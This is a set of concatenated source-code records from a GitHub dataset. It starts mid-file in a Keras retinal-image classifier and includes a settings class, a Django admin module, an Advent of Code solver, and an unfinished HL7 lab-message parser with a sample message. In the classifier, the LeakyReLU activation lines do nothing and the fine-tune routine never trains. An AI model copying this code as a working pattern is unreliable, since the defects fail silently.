bias_regularizer=l2(0.01), padding='same', name='block4_conv1'))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(Conv2D(256, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block4_conv2'))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(Conv2D(256, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block4_conv3'))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(BatchNormalization())\n self.model.add(MaxPooling2D((3, 3), strides=(2, 2), name='block4_pool2'))\n\n # Block 5\n self.model.add(Conv2D(512, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block5_conv1'))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(Conv2D(512, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block5_conv2'))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(Conv2D(512, (3,3), kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01), padding='same', name='block5_conv3'))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(BatchNormalization())\n self.model.add(MaxPooling2D((3, 3), strides=(2, 2), name='block5_pool2'))\n self.model.add(Dropout(0.5))\n\n self.model.add(Flatten(name='flatten'))\n self.model.add(Dense(1024))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(Dropout(0.5))\n self.model.add(Dense(1024))\n activation=LeakyReLU(alpha=0.01), \n self.model.add(Dense(5, activation='softmax'))\n\n def abort_train_test_split(self, X, y, test=False):\n sss = StratifiedShuffleSplit(n_splits=150, test_size=0.2, random_state=23) #这个看不懂是smg?\n spl = sss.split(X, y)\n tr, te = next(iter(spl))\n X_train, y_train = X[tr], y[tr]\n X_valid, y_valid = X[te], y[te]\n\n return X_train, X_valid, y_train, y_valid\n\n def fine_tune(self, X, y):\n #X = np.array(X)\n #y = np.array(y)\n #X_train, X_valid, y_train, y_valid = self.train_test_split(X, y, 0.1)\n X, y = get_trainset(X, y)\n X_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=0.2, random_state=11)\n #X_valid, y_valid = get_trainset(X_val, y_val)\n print(\"Fine_tune Start\")\n batch_size = 3 #本来是4\n train_gen.fit(X)\n test_gen.fit(X)\n if self.debug>0:\n print(X_valid.shape)\n print(y_valid.shape)\n print(len(y_valid))\n train_generator = train_gen.flow(X_train, y_train, batch_size=batch_size, shuffle=True)\n validate_generator = test_gen.flow(X_valid, y_valid, batch_size=batch_size, shuffle=True)\n lr = 0.1\n decay = 0.0001\n tb = TensorBoard(log_dir='logs', histogram_freq=5) #这个淘宝打不出来也很尴尬啊!用来打印train&test种的metrics的。会保存到logs文件夹里, 1个epoch打印5次activation&weight histograms\n hs = History()\n es = EarlyStopping(monitor='loss', min_delta=0.0008, patience=2, mode='min',verbose = 0)\n #检测loss 如果连续2轮的min(decrease) 都0:\n print(\"my_test starts, y is\")\n print(y)\n X_test, y_true = get_testset(X,y)\n if self.debug>0:\n print(y_true)\n y_pred = self.model.predict(X_test)\n print(\"sensitivity={}, specity={}\"\"\".format(sensi(y_true, y_pred),speci(y_true, y_pred)))\n \n def make_submission(self, files, names, weights, subm):\n self.model.load_weights(weights)\n X = get_testset(files)\n print('------load done------')\n y_prob = self.model.predict(X, batch_size=2)\n print('------predict done------')\n y_hat = np.argmax(y_prob, axis=1)\n y_dic = {'level':y_hat}\n sub = pd.DataFrame(y_dic)\n sub.insert(0, 'image', names)\n sub.to_csv(subm, index=False)\n print('-------done-------')\n\n\n \n\n\n\n\n\n\n\n\n\n\n","repo_name":"YeahHuang/DR-image-classification","sub_path":"nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":15754,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"28274023977","text":"import os\nfrom dotenv import load_dotenv\nfrom .utils.file_utils import check_folder\n\n# Load environment variables from .env file\nload_dotenv()\n\nclass Config():\n def __init__(self):\n self.ip = os.getenv('IP', \"127.0.0.1:7860\")\n self.is_auto_save = True\n self.is_auto_save = os.getenv('IS_AUTO_SAVE')\n save_name = os.getenv('WORK_DIR', \"templates\")\n outputs_name = os.getenv('OUTPUT_DIR', \"outputs\")\n\n #根目录\n self.project_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\n\n work_temp_dir = os.path.join(self.project_dir, save_name)\n check_folder(work_temp_dir)\n self.work_dir = work_temp_dir\n\n output_temp_dir = os.path.join(self.project_dir, outputs_name)\n check_folder(output_temp_dir)\n self.output_dir = output_temp_dir\n\n def set_is_auto_save(self, value: bool):\n self.is_auto_save = value\n \n def set_ip(self, value: str):\n self.ip = value\n\n def set_work_dir(self, folder_name: str):\n work_temp_dir = os.path.join(self.project_dir, folder_name)\n check_folder(work_temp_dir)\n\n self.work_dir = work_temp_dir\n\n def set_outputs_dir(self, folder_name: str):\n output_temp_dir = os.path.join(self.project_dir, folder_name)\n check_folder(output_temp_dir)\n\n self.output_dir = output_temp_dir\n\nconfig = Config()","repo_name":"varhuman/sd_styler","sub_path":"modules/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34515171144","text":"from copy import deepcopy\n\nfrom dal import autocomplete\nfrom django.contrib import admin\nfrom mezzanine.pages.models import RichTextPage\nfrom django.contrib import admin\nfrom django.utils import timezone\nfrom mezzanine.pages.admin import PageAdmin, PageAdminForm\n\nfrom derrida.outwork.models import Outwork\n\n\n# customize page admin fieldset for outwork\n# move description from metadata to main, since we are using it as excerpt\n# remove in menus and login required\noutwork_fieldsets = deepcopy(PageAdmin.fieldsets)\n# outwork_fieldsets[0][1]['fields'].insert(3, 'content')\n# outwork_fieldsets[0][1]['fields'].insert(3, ('description', 'gen_description'))\noutwork_fieldsets[0][1]['fields'].remove('in_menus')\noutwork_fieldsets[0][1]['fields'].extend(['author', 'orig_pubdate',\n ('description', 'gen_description'), 'content'])\noutwork_fieldsets[0][1]['fields'].remove('login_required')\noutwork_fieldsets[1][1]['fields'].remove(('description', 'gen_description'))\noutwork_fieldsets[1][1]['fields'].remove(('in_sitemap'))\n# use grappelli collapse logic, default open\noutwork_fieldsets[1][1]['classes'] = ('grp-collapse grp-open',)\n\n\nclass OutworkAdminForm(PageAdminForm):\n help_text = {\n 'description': '''Excerpt for display at the top of the page and\n in list view; also used as description in page metadata and\n for link previews.''',\n 'slug': ''' Outwork and site publication year will automatically be added.\n Should not be changed after an item is published.''',\n 'keywords': '''Optional list of comma-separated keywords for inclusion\n in page metadata''',\n }\n class Meta:\n widgets = {\n 'author': autocomplete.ModelSelect2(\n url='people:person-autocomplete',\n attrs={'data-placeholder': 'Start typing a name to search...'}\n )\n }\n\n def __init__(self, *args, **kwargs):\n super(OutworkAdminForm, self).__init__(*args, **kwargs)\n # expand help text\n for field, help_text in self.help_text.items():\n self.fields[field].help_text += help_text\n self.fields['description'].label = 'Excerpt'\n self.fields['gen_description'].initial = False\n\n\nclass OutworkAdmin(PageAdmin):\n form = OutworkAdminForm\n fieldsets = outwork_fieldsets\n\n\npage_fieldsets = deepcopy(PageAdmin.fieldsets)\n# make sure content is included\npage_fieldsets[0][1]['fields'].append('content')\n# use grappelli collapse logic, default open\npage_fieldsets[1][1]['classes'] = ('grp-collapse grp-open',)\n\nclass LocalPageAdmin(PageAdmin):\n fieldsets = page_fieldsets\n\n\nadmin.site.register(Outwork, OutworkAdmin)\nadmin.site.unregister(RichTextPage)\nadmin.site.register(RichTextPage, LocalPageAdmin)\n","repo_name":"Princeton-CDH/derrida-django","sub_path":"derrida/outwork/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"63"} +{"seq_id":"26023562072","text":"#%%\ndef is_route_in_stack(route, stack):\n for r in stack:\n if len(r) == len(route) and all(a == b for a, b in zip(r, route)):\n return True\n return False\n\n\nwith open(\"./12_input.txt\", \"r\") as file:\n connections = [line.rstrip().split(\"-\") for line in file.readlines()]\n\nconnections\n\n#%%\nstack = [[\"start\"]]\npaths = []\n\nwhile len(stack) > 0:\n route = stack.pop()\n current_cave = route[-1]\n for connection in connections:\n if current_cave in connection:\n next_cave = (\n connection[1] if connection[0] == current_cave else connection[0]\n )\n if (next_cave.islower() and next_cave not in route) or (\n next_cave.isupper()\n ):\n new_route = route + [next_cave]\n if next_cave == \"end\":\n paths.append(new_route)\n elif not is_route_in_stack(new_route, stack):\n stack.append(new_route)\n\n\nanswer_part_one = len(paths)\nanswer_part_one\n\n#%%\nstack = [[\"start\"]]\npaths = []\n\nsmall_caves = set(\n [\n conn[0]\n for conn in connections\n if conn[0].islower() and conn[0] not in [\"start\", \"end\"]\n ]\n + [\n conn[1]\n for conn in connections\n if conn[1].islower() and conn[1] not in [\"start\", \"end\"]\n ]\n)\n\n# Not really fast... 🥴\nwhile len(stack) > 0:\n route = stack.pop()\n current_cave = route[-1]\n for connection in connections:\n if current_cave in connection:\n next_cave = (\n connection[1] if connection[0] == current_cave else connection[0]\n )\n if next_cave == \"start\":\n continue\n\n small_cave_counts_greater_than_one = [\n route.count(c) for c in small_caves if route.count(c) > 1\n ]\n if (\n next_cave.islower()\n and (\n len(small_cave_counts_greater_than_one) == 0\n or (\n len(small_cave_counts_greater_than_one) == 1\n and max(small_cave_counts_greater_than_one) == 2\n )\n )\n ) or (next_cave.isupper()):\n new_route = route + [next_cave]\n if next_cave == \"end\":\n paths.append(new_route)\n elif not is_route_in_stack(new_route, stack):\n stack.append(new_route)\n\nanswer_part_two = len(paths)\nanswer_part_two\n","repo_name":"yveso/advent-of-code-2021","sub_path":"11-20/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"15574821816","text":"# This part of the program assigns the ENTIRE HL7 v2.5.1 message to a variable called \"hl7\" to identify this as the whole message (as a string).\nhl7 = \"\"\"MSH|^~\\&|QLS^2.16.840.1.113883.3.165.2^ISO|QUEST WEST HILLS^05D0642827^CLIA|NV^2.16.840.1.114222.4.3.2.2.3.600.4^ISO|NVDOH^2.54.944.1.447329.0.2.400493^ISO|20220909040419.1651-0700||ORU^R01^ORU_R01|MET-ELRNV60-LV142381S-20220909-20220909 04:04:19.1651|P|2.5.1|||AL|AL|USA||||PHLabReport-Ack^^2.16.840.1.113883.9.11^ISO\nPID|1||104417^^^Banner Churchill Community Hospital&29D0539273&CLIA^MR^Banner Churchill Community Hospital&29D0539273&CLIA~12345678987^^^Banner Churchill Community Hospital&29D0539273&CLIA^PI^Banner Churchill Community Hospital&29D0539273&CLIA~XxxXx1234^^^SSN&2.16.840.1.113883.4.1&ISO^SS||LastName^FirstName^MiddleName^^^^L||19791028|M||2106-3^White^CDCREC^309316^White/Caucasian^L^2.5.1|1248 Anywhere Street^^FALLON^NV^89406^USA^C||^PRN^PH^^^775^1234567|||||||||N^Not Hispanic or Latino^HL70189^152116557^Not Hispanic or Latino^L^2.5.1\nORC|RE|04295406G0k6G^QUEST^2.16.840.1.113883.3.165.5^ISO|LV130458S6G0k6G_395QAW^QUEST^2.16.840.1.113883.3.165.4^ISO||CM|||||||1861572679^WATSON^DAVID^^^^^^NPI&2.16.840.1.113883.4.6&ISO^L^^^NPI^^^^^^^^||^^^^^^|||||||DESERT VIEW HOSPITAL-CPU^D|360 S LOLA LN^^PAHRUMP^NV^89048-0884^USA^O|^WPN^PH^^1^775^7517852^^OFFICE CONTACT: BRYAN CURTIS|360 S LOLA LN^^PAHRUMP^NV^89048-0884\nOBR|1|04295406G0k6G^QUEST^2.16.840.1.113883.3.165.5^ISO|LV130458S6G0k6G_395QAW^QUEST^2.16.840.1.113883.3.165.4^ISO|^^^395^CULTURE, URINE, ROUTINE^L^^v unknown|||202209061012-0700|||||||||1861572679^WATSON^DAVID^^^^^^NPI&2.16.840.1.113883.4.6&ISO^L^^^NPI^^^^^^^^|^^^^^^|||||20220908143813-0700|||F||||||\nOBX|1|CE|43409-2^BACTERIA ISLT CULT^LN^75000300^ISOLATE 1:^L^^v unknown|1|409801009^Klebsiella pneumoniae (ESBL)^SCT^KPESBL^Klebsiella pneumoniae (ESBL)^L|||A^Abnormal (applies to non-numeric results)^HL70078^^^^2.7|||F|||202209061012-0700|29D0652720||||20220908143758-0700||||QUEST DIAGNOSTICS - LAS VEGAS^L^^^^CLIA&2.16.840.1.113883.4.7&ISO^XX^^^29D0652720|4230 BURNHAM AVE^^LAS VEGAS^NV^89119-5408^^L|^IOLE^ELIZABETH^D.^^^^^^^^^^^^^^^^^ MD\nNTE|1||KLEBSIELLA PNEUMONIAE (ESBL)\nNTE|2||GREATER THAN 100,000 CFU/ML OF\nNTE|3||ESBL RESULT: THE ORGANISM HAS BEEN CONFIRMED AS AN ESBL PRODUCER.\nOBX|2|NM|18906-8^CIPROFLOXACIN SUSC ISLT^LN^77002706^CIPROFLOXACIN^L^^v unknown|1|2|1^^L||R^Resistant. Indicates for microbiology susceptibilities only.^HL70078^^^^2.7|||F|||202209061012-0700|29D0652720||||20220908143758-0700||||QUEST DIAGNOSTICS - LAS VEGAS^L^^^^CLIA&2.16.840.1.113883.4.7&ISO^XX^^^29D0652720|4230 BURNHAM AVE^^LAS VEGAS^NV^89119-5408^^L|^IOLE^ELIZABETH^D.^^^^^^^^^^^^^^^^^ MD\nOBX|3|SN|18932-4^IMIPENEM SUSC ISLT^LN^77003906^IMIPENEM^L^^v unknown|1|<=^0.25|1^^L||S^Susceptible. Indicates for microbiology susceptibilities only.^HL70078^^^^2.7|||F|||202209061012-0700|29D0652720||||20220908143758-0700||||QUEST DIAGNOSTICS - LAS VEGAS^L^^^^CLIA&2.16.840.1.113883.4.7&ISO^XX^^^29D0652720|4230 BURNHAM AVE^^LAS VEGAS^NV^89119-5408^^L|^IOLE^ELIZABETH^D.^^^^^^^^^^^^^^^^^ MD\nOBX|4|ST|18878-9^CEFAZOLIN SUSC ISLT^LN^77000906^CEFAZOLIN^L^^v unknown|1|>=64,E127|||R^Resistant. Indicates for microbiology susceptibilities only.^HL70078^^^^2.7|||F|||202209061012-0700|29D0652720||||20220908143758-0700||||QUEST DIAGNOSTICS - LAS VEGAS^L^^^^CLIA&2.16.840.1.113883.4.7&ISO^XX^^^29D0652720|4230 BURNHAM AVE^^LAS VEGAS^NV^89119-5408^^L|^IOLE^ELIZABETH^D.^^^^^^^^^^^^^^^^^ MD\nSPM|1|04295406G0k6G&QUEST&2.16.840.1.113883.3.165.5&ISO^LV130458S6G0k6G&QUEST&2.16.840.1.113883.3.165.4&ISO||122575003^Urine specimen (specimen)^SCT^UR^Urine^HL70487^2.5.1^V UNKNOWN^URINE|||||||||||||202209061012-0700|20220906175300-0700\n\"\"\"\n\n# This part splits the entire HL7 v2.5.1 message assigned to the variable \"hl7\" into segments that are separated by the \"\\n\" character. \nhl7_split = hl7.split(\"\\n\")\n\n\"\"\"\nThe \"___()\" function:\n 1. Takes ___ argument, which is the result of the \"___\" function.\n 2. Creates a new ___ assigned to the variable \"___\".\n 3. Iterates through the new ___ using a \"for\" loop, checking for the \"___\" variable.\n 4. Defines the \"___\" variable as the index of the items in the new ___, and assigns this to the variable \"___\"\n 5. Returns the entire new ___ as a ___ split up into each field of the segment of the original HL7 v2.5.1 message.\n\"\"\"\n\"\"\"\ndef validate_input(menu, menu_prompt):\n print(*menu, sep=\"\\n\")\n menu_selection = int(input(menu_prompt))\n #while 0 > menu_selection < (len(menu()) - 1):\n while 0 <= menu_selection <= (len(menu()) - 1):\n #while True:\n #try:\n # menu_selection = int(input(menu_prompt))\n #except ValueError:\n print(\"You must enter a number that corresponds with the menu option you'd like to select.\" + \"\\n\" + \"Please enter a valid menu number: \")\n #continue\n else:\n return menu[menu_selection]\n \n #break\n #else:\n #print(\"else in first while loop\")\n\"\"\"\n\n\n# The \"menu()\" function:\n# 1. Creates a new list assigned to the variable \"main_menu\" containing each menu option as an item in the list.\n# 2. Prints the entire \"main_menu\" list, with each menu option on a new line.\ndef menu():\n main_menu = [\n \"[1] View Entire HL7 Message\",\n \"[2] Message Header\",\n \"[3] Patient Identification\",\n \"[4] Lab Order Information\",\n \"[5] Lab Result Information\",\n \"[6] Specimen Information\",\n \"[0] Exit\"]\n print(\"HL7 PARSER MAIN MENU\")\n print(*main_menu, sep=\"\\n\")\n\n# MAIN MENU OPTION 1: View Entire HL7 Message (There is no pre-defined function for this option. The code is within a \"while\" statement later in the program.)\n# Choosing Option \"1\" from the Main Menu will display the entire HL7 Message, then display the Main Menu again and prompt the user to make another selection.\n\n# MAIN MENU OPTION 2: Message Header\n# The \"menu_Message_Header()\" function:\n# 1. Creates a new list assigned to the variable \"message_header_menu\" containing each menu option as an item in the list.\n# 2. Prints the entire \"message_header_menu\" list, with each menu option on a new line.\ndef menu_Message_Header():\n message_header_menu = [\n \"[1] View Entire Message Header Segment\",\n \"[2] Sending Facility\",\n \"[3] Receiving Facility\",\n \"[4] Message Type Information\",\n \"[5] HL7 Message Version\",\n \"[0] Back to Main Menu\"]\n print(\"MESSAGE HEADER MENU\")\n print(*message_header_menu, sep=\"\\n\")\n\n# MAIN MENU OPTION 3: Patient Identification\n# The \"menu_Patient_Identification()\" function:\n# 1. Creates a new list assigned to the variable \"patient_identification_menu\" containing each menu option as an item in the list.\n# 2. Prints the entire \"patient_identification_menu\" list, with each menu option on a new line.\ndef menu_Patient_Identification():\n patient_identification_menu = [\n \"[1] View Entire Patient Identification Segment\",\n \"[2] Patient Name\",\n \"[3] Patient Date of Birth\",\n \"[4] Patient Address\",\n \"[5] Patient Phone Number\",\n \"[0] Back to Main Menu\"]\n print(\"PATIENT IDENTIFICATION MENU\")\n print(*patient_identification_menu, sep=\"\\n\")\n\n# MAIN MENU OPTION 4: Lab Order Information\n# The \"menu_Lab_Order()\" function:\n# 1. Creates a new list assigned to the variable \"lab_order_menu\" containing each menu option as an item in the list.\n# 2. Prints the entire \"lab_order_menu\" list, with each menu option on a new line.\ndef menu_Lab_Order():\n lab_order_menu = [\n \"[1] View All Lab Order Segments\",\n \"[2] Ordering Facility Information\",\n \"[3] Ordering Provider Information\",\n \"[4] Lab Order Information\",\n \"[0] Back to Main Menu\"]\n print(\"LAB ORDER INFORMATION MENU\")\n print(*lab_order_menu, sep=\"\\n\")\n\n# MAIN MENU OPTION 5: Lab Result Information\n# The \"menu_Lab_Result()\" function:\n# 1. Creates a new list assigned to the variable \"lab_result_menu\" containing each menu option as an item in the list.\n# 2. Prints the entire \"lab_result_menu\" list, with each menu option on a new line.\ndef menu_Lab_Result():\n lab_result_menu = [\n \"[1] View All Lab Result Segments\",\n \"[2] Lab Results\",\n \"[0] Back to Main Menu\"]\n print(\"LAB RESULT INFORMATION MENU\")\n print(*lab_result_menu, sep=\"\\n\")\n\n# MAIN MENU OPTION 6: Specimen Information\n# The \"menu_Specimen()\" function:\n# 1. Creates a new list assigned to the variable \"specimen_menu\" containing each menu option as an item in the list.\n# 2. Prints the entire \"specimen_menu\" list, with each menu option on a new line.\ndef menu_Specimen():\n specimen_menu = [\n \"[1] View Entire Specimen Segment\",\n \"[2] Specimen Information\",\n \"[0] Back to Main Menu\"]\n print(\"SPECIMEN INFORMATION MENU\")\n print(*specimen_menu, sep=\"\\n\")\n\n# MAIN MENU OPTION 0: Exit (There is no pre-defined function for this option. The code is within a \"while\" statement later in the program.)\n# Choosing Option \"0\" from the Main Menu will exit the HL7 Parser Program.\n\n\"\"\"\nFUNCTION TO RETURN ALL DATA WITHIN SPECIFIED HL7 SEGMENT(S)\nThe \"segment(hl7_split, header)\" function:\n 1. Takes two arguments:\n - \"hl7_split\" is the original HL7 Message, split into segments, using the \"\\n\" character as a delimiter.\n - \"header\" is a three character string that corresponds to the three character header of the segment(s) being used from the HL7 message .\n 2. Creates a new dictionary and assigns it to the variable \"newdict\".\n 3. Iterates through the HL7 Message segment(s) identified by the \"hl7_split\" variable using a \"for\" loop, checking for the \"segment\" variable.\n 4. Assigns the \"key\" for \"newdict\" to the first three characters of the selected HL7 message segment(s), which is the segment header.\n 5. Assigns the \"value\" for \"newdict\" to the characters from position three through the rest of the string in the selected HL7 message segment(s).\n 6. Uses a conditional \"if\" statement to ensure all occurances of a segment header (key), and the segment containing the header(s) (value)\n are included in a new list called \"newdict[key]\", by checking if they are in the list as the function iterates through the HL7 message.\n This part of the function also appends one or multiple segments to the newly created list.\n 7. Returns all occurences of segment(s) (value) paired with the segment header (key) in the new list (newdict[key]) as a string, based on the arguments passed into the function.\n 8. This function's arguments are designed to include the entire \"segment\" when returning the result. The \"header\" is re-attached when returning the result.\n\"\"\"\ndef segment(hl7_split, header):\n newdict = {}\n for segment in hl7_split:\n key = segment[0:3]\n value = segment[3:]\n\n if key not in newdict:\n newdict[key] = []\n newdict[key].append(value)\n \n else:\n newdict[key].append(value)\n\n return header + newdict[header][0]\n\n\"\"\"\nFUNCTION TO RETURN DATA WITHIN A SPECIFIED FIELD WITHIN SPECIFIED HL7 SEGMENT(S)\nThe \"field(hl7_split, header, field)\" function:\n 1. Takes three arguments:\n - \"hl7_split\" is the original HL7 Message, split into segments, using the \"\\n\" character as a delimiter.\n - \"header\" is a three character string that corresponds to the three character header of the segment(s) being used from the HL7 message .\n - \"field\" is a list of items within the segment(s) from the original HL7 Message, split into fields, using the \"^\" character as a delimiter.\n 2. Uses a conditional \"if\" statement to ensure that if the \"MSH\" or \"Message Header\" segment is selected using the function,\n the number passed to the \"field\" argument reflects the actual number convention for HL7 messages.\n 3. Creates a new dictionary and assigns it to the variable \"newdict\".\n 4. Iterates through the HL7 Message segment(s) identified by the \"hl7_split\" variable using a \"for\" loop, checking for the \"segment\" variable.\n 5. Assigns the \"key\" for \"newdict\" to the first three characters of the selected HL7 message segment(s), which is the segment header.\n 6. Assigns the \"value\" for \"newdict\" to the characters from position three through the rest of the string in the selected HL7 message segment(s).\n 7. Uses another conditional \"if\" statement to ensure all occurances of a segment header (key), and the segment containing the header(s) (value)\n are included in a new list called \"newdict[key]\", by checking if they are in the list as the function iterates through the HL7 message.\n This part of the function also further splits the segments by \"|\" and \"^\" delimiters whether one or multiple segments are appended to the newly created list.\n 8. Returns only the pieces of the new list (newdict[key]) as a string, based on the arguments passed into the function.\n 9. This function's arguments are designed to drilldown only to the \"field\" level when returning the result.\n\"\"\"\ndef field(hl7_split, header, field):\n if header == \"MSH\":\n field = field - 2\n else:\n field = field - 1\n \n newdict = {}\n for segment in hl7_split:\n key = segment[0:3]\n value = segment[3:]\n\n if key not in newdict:\n newdict[key] = []\n newdict[key].append([field.split(\"^\") for field in value.split(\"|\")][1:])\n \n else:\n newdict[key].append([field.split(\"^\") for field in value.split(\"|\")][1:])\n\n return \"\".join(newdict[header][0][field])\n\n\"\"\"\nThe \"field(hl7_split, header, field)\" function:\n 1. Takes three arguments:\n - \"hl7_split\" is the original HL7 Message, split into segments, using the \"\\n\" character as a delimiter.\n - \"header\" is a three character string that corresponds to the three character header of the segment(s) being used from the HL7 message .\n - \"field\" is a list of items within the segment(s) from the original HL7 Message, split into fields, using the \"^\" character as a delimiter.\n 2. Uses a conditional \"if\" statement to ensure that if the \"MSH\" or \"Message Header\" segment is selected using the function,\n the number passed to the \"field\" argument reflects the actual number convention for HL7 messages.\n 3. Creates a new dictionary and assigns it to the variable \"newdict\".\n 4. Iterates through the HL7 Message segment(s) identified by the \"hl7_split\" variable using a \"for\" loop, checking for the \"segment\" variable.\n 5. Assigns the \"key\" for \"newdict\" to the first three characters of the selected HL7 message segment(s), which is the segment header.\n 6. Assigns the \"value\" for \"newdict\" to the characters from position three through the rest of the string in the selected HL7 message segment(s).\n 7. Uses another conditional \"if\" statement to ensure all occurances of a segment header (key), and the segment containing the header(s) (value)\n are included in a new list called \"newdict[key]\", by checking if they are in the list as the function iterates through the HL7 message.\n This part of the function also further splits the segments by \"|\" and \"^\" delimiters whether one or multiple segments are appended to the newly created list.\n 8. Returns only the pieces of the new list (newdict[key]), based on the arguments passed into the function.\n 9. This function's arguments are designed to drilldown all the way to the \"field_separator\" level when returning the result.\n\"\"\"\ndef field_separator(hl7_split, header, field, field_separator):\n if header == \"MSH\":\n field = field - 2\n else:\n field = field - 1\n \n newdict = {}\n for segment in hl7_split:\n key = segment[0:3]\n value = segment[3:]\n \n if key not in newdict:\n newdict[key] = []\n newdict[key].append([field.split(\"^\") for field in value.split(\"|\")][1:]) \n else:\n newdict[key].append([field.split(\"^\") for field in value.split(\"|\")][1:])\n\n return newdict[header][0][field][field_separator - 1]\n\n\"\"\"\nBeginning of HL7 Application...\n\"\"\"\ntry:\n # DISPLAY MAIN MENU\n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \"))\n #print(len(menu()) - 1)\n #option_Menu = validate_input(menu(), \"Enter a number for the message section you would like to view: \")\nexcept:\n # DISPLAY MAIN MENU AFTER INVALID NUMBER ENTERED\n print(\"\\n\" + \"Invalid option! You must enter a number between 1 and 6...\" + \"\\n\")\n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \"))\n\n\"\"\"\nMain Menu of HL7 Application...\n\"\"\"\n# Entering \"0\" breaks out of the while loop, prints: \"You have exited the HL7 Program.\" and then exits the program.\nwhile option_Menu != 0: \n if option_Menu == 1:\n # DISPLAY ENTIRE HL7 MESSAGE\n print(\"\\n\" + \"Entire HL7 Message: \" + \"\\n\" + hl7)\n\n # DISPLAY MAIN MENU AFTER DISPLAYING ENTIRE HL7 MESSAGE \n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \"))\n\n elif option_Menu == 2:\n # DISPLAY MESSAGE HEADER MENU\n print() # Added for one line of space between menus...\n menu_Message_Header()\n option_Message_Header = int(input(\"Enter a number for the Message Header information you would like to view: \"))\n\n # Entering \"0\" breaks out of the while loop, prints the main menu options, then prompts the user to select an option from the main menu.\n while option_Message_Header != 0:\n if option_Message_Header == 1:\n print(\"\\n\" + \"Entire Message Header Segment (MSH): \" + \"\\n\" + str(segment(hl7_split, \"MSH\")) + \"\\n\")\n elif option_Message_Header == 2:\n print(\"\\n\" + \"Sending Facility: \" + str(field_separator(hl7_split, \"MSH\", 4, 1)) + \"\\n\")\n elif option_Message_Header == 3:\n print(\"\\n\" + \"Receiving Facility: \" + str(field_separator(hl7_split, \"MSH\", 6, 1)) + \"\\n\")\n elif option_Message_Header == 4:\n print(\"\\n\" + \"Message Type Information: \" + (str(field_separator(hl7_split, \"MSH\", 9, 3)) + \" (Message Structure)\").rjust(15) + \"\\n\" + (str(field_separator(hl7_split, \"MSH\", 9, 1)) + \" (Message Code)\").rjust(48) + \"\\n\" + (str(field_separator(hl7_split, \"MSH\", 9, 2)) + \" (Trigger Event)\").rjust(49) + \"\\n\")\n elif option_Message_Header == 5:\n print(\"\\n\" + \"Message Version: \" + \"HL7 v\" + str(field(hl7_split, \"MSH\", 12)) + \"\\n\")\n else:\n print(\"\\n\" + \"Please enter a valid option.\")\n\n # DISPLAY MESSAGE HEADER MENU AFTER RESULT OF LAST MENU SELECTION\n menu_Message_Header()\n option_Message_Header = int(input(\"Enter a number for the corresponding Message Header information: \"))\n else:\n # DISPLAY MAIN MENU AFTER OPTION \"0\" SELECTED IN PREVIOUS MENU TO GO BACK\n print() # Added for one line of space between menus...\n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \"))\n\n elif option_Menu == 3:\n # DISPLAY PATIENT IDENTIFICATION MENU\n print() # Added for one line of space between menus...\n menu_Patient_Identification()\n option_Patient_Identification = int(input(\"Enter a number for the Patient Identification information you would like to view: \"))\n \n # Entering \"0\" breaks out of the while loop, prints the main menu options, then prompts the user to select an option from the main menu.\n while option_Patient_Identification != 0:\n if option_Patient_Identification == 1:\n print(\"\\n\" + \"Entire Patient Identification Segment (PID): \" + \"\\n\" + str(segment(hl7_split, \"PID\")) + \"\\n\")\n elif option_Patient_Identification == 2:\n print(\"\\n\" + \"2\" + \"\\n\")\n elif option_Patient_Identification == 3:\n print(\"\\n\" + \"3\" + \"\\n\")\n elif option_Patient_Identification == 4:\n print(\"\\n\" + \"4\" + \"\\n\")\n elif option_Patient_Identification == 5:\n print(\"\\n\" + \"5\" + \"\\n\")\n else:\n print(\"\\n\" + \"Please enter a valid option.\")\n\n # DISPLAY PATIENT IDENTIFICATION MENU AFTER RESULT OF LAST MENU SELECTION\n menu_Patient_Identification()\n option_Patient_Identification = int(input(\"Enter a number for the corresponding Patient Identification information: \"))\n else:\n # DISPLAY MAIN MENU AFTER OPTION \"0\" SELECTED IN PREVIOUS MENU TO GO BACK\n print() # Added for one line of space between menus...\n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \"))\n\n elif option_Menu == 4:\n # DISPLAY LAB ORDER MENU\n print() # Added for one line of space between menus...\n menu_Lab_Order()\n option_Lab_Order = int(input(\"Enter a number for the Lab Order information you would like to view: \"))\n \n # Entering \"0\" breaks out of the while loop, prints the main menu options, then prompts the user to select an option from the main menu.\n while option_Lab_Order != 0:\n if option_Lab_Order == 1:\n print(\"\\n\" + \"Entire Common Order Segment (ORC): \" + \"\\n\" + str(segment(hl7_split, \"ORC\")))\n print(\"\\n\" + \"Entire Observation Request Segment (OBR): \" + \"\\n\" + str(segment(hl7_split, \"OBR\")) + \"\\n\")\n elif option_Lab_Order == 2:\n print(\"\\n\" + \"2\" + \"\\n\")\n elif option_Lab_Order == 3:\n print(\"\\n\" + \"3\" + \"\\n\")\n elif option_Lab_Order == 4:\n print(\"\\n\" + \"4\" + \"\\n\")\n else:\n print(\"\\n\" + \"Please enter a valid option.\")\n\n # DISPLAY 